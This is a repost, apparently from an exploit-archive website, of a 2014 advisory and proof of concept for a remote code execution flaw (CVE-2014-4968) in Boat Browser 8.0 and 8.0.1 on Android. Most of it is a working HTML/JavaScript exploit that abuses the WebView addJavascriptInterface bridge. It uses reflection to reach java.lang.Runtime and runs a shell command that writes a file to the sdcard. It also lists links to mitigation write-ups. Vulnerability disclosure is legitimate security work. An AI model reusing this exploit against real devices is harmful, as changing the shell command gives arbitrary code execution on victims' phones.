首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability
来源:https://twitter.com/c0otlass 作者:c0otlass 发布时间:2014-07-17  
<!--
.:: Remote code execution vulnerability in Boat Browser ::.


credit: c0otlass
social contact: https://twitter.com/c0otlass
mail: c0otlass@gmail.com
CVE reserved : 2014-4968
time of discovery:  July 14, 2014
Browser Official site:http://www.boatmob.com/
Browser download link:https://play.google.com/store/apps/details?id=com.boatbrowser.free&hl=en
version Affected : In  8.0 and 8.0.1 tested , Android 3.0 through 4.1.x
Risk rate: High
vulnerability Description impact:
The WebView class and  use of the WebView.addJavascriptInterface method has vulnerability which cause remote code in html page run in android device
a related issue to CVE-2012-6636
proof of concept:
//..............................................poc.hmtl............................................
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UFT-8">
<title>CreatMalTxt POC - WebView</title>
<script>
var obj;
function TestVulnerability()
{
temp="not";
var myObject = window;
for (var name in myObject) {
if (myObject.hasOwnProperty(name)) {
try
{
temp=myObject[name].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null);
}
catch(e)
{
}
}
}
if(temp=="not")
{
document.getElementById("log").innerHTML="this browser has been patched";
}
else{
document.getElementById("log").innerHTML = "This browser is exploitabale" + "<br>" + " the poc file hase been created in sdcard ...<br>" ;
document.getElementById("log").innerHTML +=  "we could see proccess information"+ temp.exec(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']);
}
}
</script>
</head>
<body >
<h3>CreatMalTxt POC</h3>
<input value="Test Vulnerability"  type="button"  onclick="TestVulnerability();" />
<div id="log"></div>
</body>
</html>

<!--
Solution:
https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
http://www.programering.com/a/MDM3YzMwATc.html
https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614

References:
http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/
https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/
http://50.56.33.56/blog/?p=314
https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py
-->
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wordpress WPTouch Authenticate
·Node Browserify 4.2.0 - Remote
·Browserify 4.2.0 Remote Comman
·NTP Amplification Denial Of Se
·Oracle VirtualBox Guest Additi
·ACME micro_httpd - Denial of S
·Elipse E3 Scada PLC Denial Of
·OpenVAS Manager 4.0 - Authenti
·HP Data protector manager 8.10
·IBM GCM16/32 1.20.0.22575 - Mu
·D-Link info.cgi POST Request B
·Raritan PowerIQ 4.1.0 - SQL In
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved